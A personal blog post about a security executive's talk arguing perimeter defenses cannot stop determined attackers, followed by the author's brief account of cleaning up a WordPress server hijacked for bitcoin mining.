Perimeter defense almost worthless
Saw an enlightening talk by the CTO of Trend Micro a few months back, hoping the org that hosted the event posts the video online, been waiting months and nothing yet.. here is another video with him from another event that is similar (though the talk I saw was ~45min this is ~10)
I didn't learn anything but it was awesome to see the honesty come from someone in his position where he just comes out and says it - if someone wants to get in, they get in. Just accept it. Doesn't matter how much you invest it won't be enough. His summary of the RSA break in was entertaining as well. He admits his own industry is at fault in putting a false sense of security in their customers "just buy this product it will make you safe". At the end he was pitching a new product of theirs but he said on several occasions that it won't protect you against everything.
Here's a PDF from the presentation I was at
Security is not my focus so I don't try to stay on top of everything in that field but his coverage of the bank attack in Korea was quite good too (page 36 of the PDF), nearly 50,000 computers disabled. In all 76 tailor-made malware were used, targeting both Windows and Linux/Unix systems.
I normally skip keynotes and stuff at events(the events that I do attend, which in itself is rare). This guy was just great though.
Perhaps the most ..informative stat(?) he cited is in 2012 the average time an attacker has access to a network before detection is 210 days (35 days longer than 2011).
Seeing that makes me glad security is not my focus, because really those guys are fighting a war they simply cannot win. "Ooh look this new shiny firewall or IDS/IPS!! But we still got hacked......."
I dealt with a hacked system on Sunday, first time in probably 5 years I've been involved in one. System wasn't being managed by anyone, ran a wordpress blog that was out of date. It seems like some worm got in by one of the recent code execution exploits, for some reason it wiped out the data on the wordpress blog itself (seems careless because that's how it was detected almost immediately) and downloaded some files and basically turned the host into a bitcoin mining operation(complete with fake program signatures to make it look like normal processes were running, and a crontab to re-download itself every so often). I don't believe they ever got root as they never wiped any of the logs, the apache error logs clearly showed the exploit in action. The IT folks restored the system from an earlier backup and updated wordpress. Now they want to transition responsibility of this system to me but I want nothing of it. It was an interesting exercise though, took only maybe 5 minutes to determine what was going on, obviously not a sophisticated attack.
In the event on Sunday there was absolutely no fancy security system in place, the incident was picked up on basic monitors within minutes of it happening because the worm/attacker wiped out the data causing the website to return errors.